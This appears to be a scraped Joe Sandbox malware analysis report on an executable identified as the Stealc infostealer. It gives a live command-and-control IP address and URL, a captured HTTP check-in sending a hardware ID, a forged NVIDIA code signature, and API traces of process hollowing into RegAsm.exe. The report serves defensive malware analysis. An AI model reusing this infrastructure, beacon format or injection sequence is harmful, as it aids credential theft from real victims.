          LSA Secrets12
          System Information Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
          Obfuscated Files or Information
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Software Packing
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.exe18%ReversingLabsWin32.Trojan.Generic
          file.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://45.152.113.10/92335b4816f77e90.php1MI100%Avira URL Cloudmalware
          http://45.152.113.10/m100%Avira URL Cloudmalware
          http://45.152.113.10/92335b4816f77e90.phpQM100%Avira URL Cloudmalware
          http://ocsp.entrust.net030%Avira URL Cloudsafe
          http://45.152.113.10/S100%Avira URL Cloudmalware
          http://45.152.113.10/92335b4816f77e90.php100%Avira URL Cloudmalware
          http://ocsp.entrust.net020%Avira URL Cloudsafe
          http://www.entrust.net/rpa030%Avira URL Cloudsafe
          http://aia.entrust.net/ts1-chain256.cer010%Avira URL Cloudsafe
          http://45.152.113.10/h100%Avira URL Cloudmalware
          http://45.152.113.1010%Avira URL Cloudsafe
          http://45.152.113.10/92335b4816f77e90.phpyM100%Avira URL Cloudmalware
          http://45.152.113.10/yt100%Avira URL Cloudmalware
          http://crl.entrust.net/ts1ca.crl00%Avira URL Cloudsafe
          http://45.152.113.10100%Avira URL Cloudmalware
          http://crl.entrust.net/2048ca.crl00%Avira URL Cloudsafe
          http://45.152.113.10/100%Avira URL Cloudmalware
          https://www.entrust.net/rpa00%Avira URL Cloudsafe
          No contacted domains info
          NameMaliciousAntivirus DetectionReputation
          http://45.152.113.10/92335b4816f77e90.phptrue
          • Avira URL Cloud: malware
          unknown
          http://45.152.113.10/true
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://45.152.113.10/SRegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://ocsp.entrust.net03file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://ocsp.entrust.net02file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://www.entrust.net/rpa03file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://45.152.113.10/92335b4816f77e90.php1MIRegAsm.exe, 00000003.00000002.2149282715.0000000001681000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://45.152.113.10/92335b4816f77e90.phpQMRegAsm.exe, 00000003.00000002.2149282715.0000000001681000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://45.152.113.10/mRegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://45.152.113.10/hRegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://aia.entrust.net/ts1-chain256.cer01file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://45.152.113.10/ytRegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://45.152.113.10/92335b4816f77e90.phpyMRegAsm.exe, 00000003.00000002.2149282715.0000000001681000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://45.152.113.10RegAsm.exe, 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          unknown
          http://crl.entrust.net/ts1ca.crl0file.exefalse
          • Avira URL Cloud: safe
          unknown
          http://45.152.113.101RegAsm.exe, 00000003.00000002.2149282715.000000000168E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://crl.entrust.net/2048ca.crl0file.exefalse
          • Avira URL Cloud: safe
          unknown
          https://www.entrust.net/rpa0file.exefalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          45.152.113.10
          unknownRussian Federation
          138576CODECCLOUD-AS-APCodecCloudHKLimitedHKtrue
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1508192
          Start date and time:2024-09-09 20:33:04 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 8s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:9
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:file.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@4/1@0/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 18
          • Number of non-executed functions: 18
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Stop behavior analysis, all processes terminated
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: file.exe
          No simulations
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          45.152.113.10file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10/92335b4816f77e90.php
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10/92335b4816f77e90.php
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CODECCLOUD-AS-APCodecCloudHKLimitedHKfile.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10
          PM7K6PbAf0.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Neoreklami, PureLog Stealer, RedLine, StealcBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousStealcBrowse
          • 45.152.113.10
          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
          • 45.152.113.10
          CVE-2024-38143 poc.exeGet hashmaliciousCodoso Ghost, UACMeBrowse
          • 38.147.172.126
          Setup.exeGet hashmaliciousGo Injector, StealcBrowse
          • 45.152.114.50
          Setup.exeGet hashmaliciousGo Injector, StealcBrowse
          • 45.152.114.50
          No context
          No context
          Process:C:\Users\user\Desktop\file.exe
          File Type:CSV text
          Category:dropped
          Size (bytes):226
          Entropy (8bit):5.360398796477698
          Encrypted:false
          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
          MD5:3A8957C6382192B71471BD14359D0B12
          SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
          SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
          SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
          Malicious:true
          Reputation:high, very likely benign file
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
          File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
          Entropy (8bit):7.97306060156867
          TrID:
          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          • Win32 Executable (generic) a (10002005/4) 49.97%
          • Generic Win/DOS Executable (2004/3) 0.01%
          • DOS Executable Generic (2002/1) 0.01%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:file.exe
          File size:210'472 bytes
          MD5:1a3ac0bc9af8e3b8cc72caaf6ba88b9f
          SHA1:885872fa24d22d8b9c118174ed3d7b7419e58fe0
          SHA256:ab6d864f42680ad444f9a445d3e403cfd1a6355985db933611ec4cb7607b76bf
          SHA512:a59b1c0530fb8fd2881d605b8513107df79a844d52a754b901b0a027fb197a20ce42ce342155b635f383e4aae52de255355213b14fb479dbf2d533e355af4426
          SSDEEP:6144:9gPmLyZ30IcCX4PWNlclz7o+pNb6CPSUbv+/QTEO:9gPmLK33X52voGNS2+YTEO
          TLSH:802413A48ED14A32FDFB0F7224949236FAF9E1543A234EF731B48A13CD566152F4532A
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^..f.............................$... ...@....@.. ....................................`................................
          Icon Hash:00928e8e8686b000
          Entrypoint:0x4324be
          Entrypoint Section:.text
          Digitally signed:true
          Imagebase:0x400000
          Subsystem:windows cui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Time Stamp:0x66DF145E [Mon Sep 9 15:29:34 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
          Signature Valid:false
          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
          Signature Validation Error:The digital signature of the object did not verify
          Error Number:-2146869232
          Not Before, Not After
          • 13/01/2023 01:00:00 17/01/2026 00:59:59
          Subject Chain
          • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
          Version:3
          Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
          Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
          Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
          Serial:0997C56CAA59055394D9A9CDB8BEEB56
          Instruction
          jmp dword ptr [00402000h]
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x3246c0x4f.text
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x5f0.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x310000x2628
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x360000xc.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x323340x1c.text
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x20000x304c40x30600e4c32561d82fe48c7547af11aaf60d8aFalse0.9910973837209303data7.9902895044889775IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rsrc0x340000x5f00x60080e72658b6ff4c9e5bddd6f5838c5108False0.44921875data4.187104311772739IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x360000xc0x20086019e23b1d9eea0b397582d388c8688False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_VERSION0x340a00x360data0.4548611111111111
          RT_MANIFEST0x344000x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
          DLLImport
          mscoree.dll_CorExeMain
          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
          2024-09-09T20:33:59.230715+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.64971345.152.113.1080TCP
          TimestampSource PortDest PortSource IPDest IP
          Sep 9, 2024 20:33:58.553092003 CEST4971380192.168.2.645.152.113.10
          Sep 9, 2024 20:33:58.559329033 CEST804971345.152.113.10192.168.2.6
          Sep 9, 2024 20:33:58.559458017 CEST4971380192.168.2.645.152.113.10
          Sep 9, 2024 20:33:58.560165882 CEST4971380192.168.2.645.152.113.10
          Sep 9, 2024 20:33:58.566359043 CEST804971345.152.113.10192.168.2.6
          Sep 9, 2024 20:33:59.086386919 CEST804971345.152.113.10192.168.2.6
          Sep 9, 2024 20:33:59.086479902 CEST4971380192.168.2.645.152.113.10
          Sep 9, 2024 20:33:59.091212034 CEST4971380192.168.2.645.152.113.10
          Sep 9, 2024 20:33:59.096044064 CEST804971345.152.113.10192.168.2.6
          Sep 9, 2024 20:33:59.230652094 CEST804971345.152.113.10192.168.2.6
          Sep 9, 2024 20:33:59.230715036 CEST4971380192.168.2.645.152.113.10
          Sep 9, 2024 20:34:00.360238075 CEST4971380192.168.2.645.152.113.10
          • 45.152.113.10
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.64971345.152.113.10803000C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          Sep 9, 2024 20:33:58.560165882 CEST88OUTGET / HTTP/1.1
          Host: 45.152.113.10
          Connection: Keep-Alive
          Cache-Control: no-cache
          Sep 9, 2024 20:33:59.086386919 CEST203INHTTP/1.1 200 OK
          Date: Mon, 09 Sep 2024 18:33:59 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 0
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
          Sep 9, 2024 20:33:59.091212034 CEST414OUTPOST /92335b4816f77e90.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECB
          Host: 45.152.113.10
          Content-Length: 214
          Connection: Keep-Alive
          Cache-Control: no-cache
          Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 44 32 44 41 38 46 46 42 44 34 31 30 36 38 35 34 30 37 36 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 2d 2d 0d 0a
          Data Ascii: ------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="hwid"84D2DA8FFBD41068540764------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="build"default------KJKKKJJJKJKFHJJJJECB--
          Sep 9, 2024 20:33:59.230652094 CEST210INHTTP/1.1 200 OK
          Date: Mon, 09 Sep 2024 18:33:59 GMT
          Server: Apache/2.4.41 (Ubuntu)
          Content-Length: 8
          Keep-Alive: timeout=5, max=99
          Connection: Keep-Alive
          Content-Type: text/html; charset=UTF-8
          Data Raw: 59 6d 78 76 59 32 73 3d
          Data Ascii: YmxvY2s=


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:14:33:56
          Start date:09/09/2024
          Path:C:\Users\user\Desktop\file.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\file.exe"
          Imagebase:0x5f0000
          File size:210'472 bytes
          MD5 hash:1A3AC0BC9AF8E3B8CC72CAAF6BA88B9F
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:1
          Start time:14:33:56
          Start date:09/09/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:3
          Start time:14:33:56
          Start date:09/09/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Imagebase:0xec0000
          File size:65'440 bytes
          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.2149282715.000000000163A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          Reputation:high
          Has exited:true

          Reset < >

            Execution Graph

            Execution Coverage:36%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:25%
            Total number of Nodes:24
            Total number of Limit Nodes:1
            execution_graph 327 f70987 328 f7099c 327->328 332 f70b47 VirtualProtect 328->332 329 f709c9 330 f704b0 VirtualProtect 329->330 331 f70a07 329->331 330->331 332->329 305 2912439 306 2912471 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 305->306 308 291264e WriteProcessMemory 306->308 309 2912693 308->309 310 29126d5 WriteProcessMemory Wow64SetThreadContext ResumeThread 309->310 311 2912698 WriteProcessMemory 309->311 311->309 312 f70988 313 f7099c 312->313 318 f70b47 313->318 314 f709c9 316 f70a07 314->316 323 f704b0 314->323 319 f70b59 318->319 320 f70e0b VirtualProtect 319->320 322 f70d9d 319->322 321 f70e48 320->321 321->314 322->314 324 f70dc0 VirtualProtect 323->324 326 f70e48 324->326 326->316

            Callgraph

            • Executed
            • Not Executed
            • Opacity -> Relevance
            • Disassembly available
            callgraph 0 Function_00F70AF7 1 Function_00F70E77 33 Function_00F701C0 1->33 2 Function_00F70475 3 Function_00F70471 4 Function_00F704F1 5 Function_00F70170 6 Function_00F700F0 7 Function_00F70070 8 Function_00F70978 9 Function_00F708E7 10 Function_02912780 11 Function_00F70465 12 Function_00F700E4 13 Function_00F70461 14 Function_00F70160 15 Function_00F70060 16 Function_00F70A6F 17 Function_00F7046D 18 Function_00F70469 19 Function_00F708E8 20 Function_00F70054 21 Function_00F700D4 22 Function_00F70154 23 Function_00F70450 24 Function_00F701D0 25 Function_02912439 26 Function_00F7045D 27 Function_00F704D8 28 Function_00F708D8 29 Function_00F70B47 30 Function_00F70847 31 Function_02912121 32 Function_00F70444 34 Function_00F70848 35 Function_00F700C8 36 Function_00F70148 37 Function_00F704C8 38 Function_00F701B4 39 Function_00F704B0 40 Function_00F700B0 41 Function_00F704BC 41->33 42 Function_00F700BC 43 Function_00F7013C 44 Function_0291275C 45 Function_00F704A4 46 Function_00F700A0 47 Function_00F7012C 48 Function_00F701A8 49 Function_00F70F97 49->33 50 Function_00F70190 51 Function_00F70090 52 Function_00F70F90 53 Function_00F7011C 54 Function_00F7019C 55 Function_00F70987 55->29 55->39 55->41 55->45 56 Function_00F70B07 57 Function_00F70501 58 Function_00F70080 59 Function_00F70100 60 Function_00F70180 61 Function_00F7010C 62 Function_00F70F8A 63 Function_0291286C 64 Function_00F70988 64->29 64->39 64->41 64->45 65 Function_00F70B08

            Control-flow Graph

            APIs
            • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029123AB,0291239B), ref: 029125A8
            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 029125BB
            • Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 029125D9
            • ReadProcessMemory.KERNELBASE(00000304,?,029123EF,00000004,00000000), ref: 029125FD
            • VirtualAllocEx.KERNELBASE(00000304,?,?,00003000,00000040), ref: 02912628
            • WriteProcessMemory.KERNELBASE(00000304,00000000,?,?,00000000,?), ref: 02912680
            • WriteProcessMemory.KERNELBASE(00000304,00400000,?,?,00000000,?,00000028), ref: 029126CB
            • WriteProcessMemory.KERNELBASE(00000304,?,?,00000004,00000000), ref: 02912709
            • Wow64SetThreadContext.KERNEL32(0000008C,02740000), ref: 02912745
            • ResumeThread.KERNELBASE(0000008C), ref: 02912754
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2136050112.0000000002912000.00000040.00000800.00020000.00000000.sdmp, Offset: 02912000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2912000_file.jbxd
            Similarity
            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
            • API String ID: 2687962208-1257834847
            • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
            • Instruction ID: 6e3fa19c5c9dc122e19aa43612b29058edd9abc10285370f096cd47ee209edd2
            • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
            • Instruction Fuzzy Hash: 88B1E67664024AAFDB60CF69CC80BDA77A9FF88714F158524EA0CAB341D774FA41CB94

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 23 f70b47-f70b7c 27 f70b7e-f70b8c 23->27 29 f70da7-f70e46 VirtualProtect 27->29 30 f70b92-f70bb2 27->30 37 f70e4d-f70e61 29->37 38 f70e48 29->38 30->29 31 f70bb8-f70bc3 30->31 31->29 33 f70bc9-f70bd4 31->33 33->27 34 f70bd6-f70bdb 33->34 36 f70bde-f70be3 34->36 36->29 39 f70be9-f70bf6 36->39 38->37 39->29 40 f70bfc-f70c08 39->40 41 f70c11-f70c16 40->41 42 f70c0a-f70c10 40->42 41->29 43 f70c1c-f70c23 41->43 42->41 43->29 44 f70c29-f70c2f 43->44 44->29 45 f70c35-f70c40 44->45 45->36 46 f70c42-f70c51 45->46 47 f70c57-f70c5e 46->47 48 f70d9d-f70da4 46->48 49 f70c60-f70c67 47->49 50 f70c68-f70c70 47->50 49->50 50->29 51 f70c76-f70c82 50->51 52 f70c84-f70c8a 51->52 53 f70c8b-f70c90 51->53 52->53 53->29 54 f70c96-f70c9d 53->54 54->29 55 f70ca3-f70ca9 54->55 55->29 56 f70caf-f70cc5 55->56 57 f70cc7-f70cce 56->57 58 f70ccf-f70cfd 56->58 57->58 61 f70cff-f70d04 58->61 62 f70d0c-f70d16 58->62 61->62 62->29 63 f70d1c-f70d25 62->63 63->29 64 f70d2b-f70d4a 63->64 65 f70d4c-f70d51 64->65 66 f70d59-f70d63 64->66 65->66 66->29 67 f70d65-f70d6a 66->67 67->29 68 f70d6c-f70d97 67->68 68->47 68->48
            APIs
            • VirtualProtect.KERNELBASE(03913594,?,?,?,?,?,?,?,00000000,?,?,00F70A07,?,00000040), ref: 00F70E39
            Memory Dump Source
            • Source File: 00000000.00000002.2135891784.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f70000_file.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: 2cab5e1b750a1fb79ccaa1ef67acf4f45083b316fe6f9ab8d24f8d30b890cc2a
            • Instruction ID: 389c89f24aa046c671292bacc4027f4b8ee896b7bbeaf88d54fd9810bff8b966
            • Opcode Fuzzy Hash: 2cab5e1b750a1fb79ccaa1ef67acf4f45083b316fe6f9ab8d24f8d30b890cc2a
            • Instruction Fuzzy Hash: A0A19F70904255CFCB11CFA9C880AADFBF2BF88314F14C5AAD899AB256C774ED41DB91

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 71 f704b0-f70e46 VirtualProtect 74 f70e4d-f70e61 71->74 75 f70e48 71->75 75->74
            APIs
